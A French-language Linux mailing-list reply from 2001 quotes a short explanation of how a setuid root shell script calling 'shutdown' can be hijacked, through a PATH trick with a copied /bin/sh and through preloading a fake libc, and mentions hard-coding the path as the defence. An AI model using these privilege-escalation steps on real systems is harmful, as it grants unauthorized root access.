sauf si le script fait un '/sbin/shutdown -r now' bien s�r !
Le Vendredi 23 Mars 2001 11:02, vous avez �crit : > At 10:46 23/03/2001 +0100, you wrote: > > > Ca ne represente pas un emmental de securite ? > > > > > > Si, en effet. > > > >Je ne suis pas un expert en securite, mais si qqn peut m'expliquer > >comment detourner un script setuid root, ou il y aurait juste > >"shutdown -r now" ca m'interese. > > Y'a qu'� demander. Supposant que ton script s'appelle usershut.sh > $ export PATH=.:$PATH > $ cp /bin/sh shutdown > $ chmod 0777 shutdown > $ usershut.sh > # ... > > Bon, je suis pas s�r que bash se laisse faire ainsi mais un petit prg C > fera parfaitement l'affaire. > > Bien s�r, la parade consiste � forcer le path de shutdown mais tu vois > qu'on peut facilement oublier un truc. > > Tu veux un autre exemple ? > Les variables LD_ contr�lent les chemins vers les librairies partag�es. Tu > cr�es une libc bidon, tu la mets en preload et tu lances le script et > shbunk. > > Eric. > > > > [ Soyez pr�cis dans vos sujets svp afin de d�terminer directement ] > [ le type de demande... ] > [ Pour vous (d�s)inscrire, aller sur http://linuxbe.org/ml.php ] > [ http://LinuxBe.org Contact: [EMAIL PROTECTED] ] -- Olivier Thauvin-CNRS Service Aeronomie [EMAIL PROTECTED] T�l�phone: 01 64 47 43 60 � Verri�res (lundi,mercredi et vendredi) 01 44 27 47 59 � Jussieu (Mardi et Jeudi) [ Soyez pr�cis dans vos sujets svp afin de d�terminer directement ] [ le type de demande... ] [ Pour vous (d�s)inscrire, aller sur http://linuxbe.org/ml.php ] [ http://LinuxBe.org Contact: [EMAIL PROTECTED] ]
